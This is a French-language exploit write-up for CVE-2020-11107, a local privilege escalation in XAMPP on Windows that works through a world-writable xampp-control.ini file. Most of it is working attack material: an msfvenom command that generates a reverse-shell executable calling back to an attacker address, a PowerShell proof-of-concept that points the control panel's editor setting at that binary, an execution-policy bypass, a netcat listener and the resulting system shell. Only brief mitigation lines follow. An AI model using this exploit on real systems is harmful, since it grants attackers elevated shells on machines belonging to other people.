
CVE-2020-11107-Élévation-de-privilèges-locale-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 est une vulnérabilité d'Escalade de Privilèges Locale (LPE) affectant Apache Friends XAMPP sous Windows.
Un utilisateur non privilégié peut modifier le fichier de configuration du panneau de contrôle XAMPP (xampp-control.ini) et remplacer l'exécutable de l'éditeur par défaut (notepad.exe) par un exécutable malveillant.
Lorsqu'un autre utilisateur (par exemple Administrateur) ouvre des journaux via le panneau de contrôle, le binaire malveillant est exécuté avec les privilèges de la victime, entraînant une escalade de privilèges.
❗ Cette vulnérabilité n'affecte PAS Linux ou macOS.
xampp-control.ini est accessible en écriture globaleC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
Vérifier la version de XAMPP :
type C:\xampp\properties.ini
Exemple de sortie :
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ La version est vulnérable.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Upload msf.exe into C:\temp
Script d'exploitation (PowerShell) :
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Exécuter le script :
powershell -ExecutionPolicy Bypass -File 50337.ps1
La victime lance :
C:\xampp\xampp-control.exe
Ensuite, elle ouvre n'importe quel fichier journal depuis le panneau de contrôle.
nc -lvnp 4444
✅ Résultat :
Connection received...
C:\WINDOWS\system32>
🎉 Escalade de privilèges réussie
Mettre à jour XAMPP vers l'une des versions suivantes (ou plus récentes) :
Restreindre les permissions sur :
C:\xampp\xampp-control.ini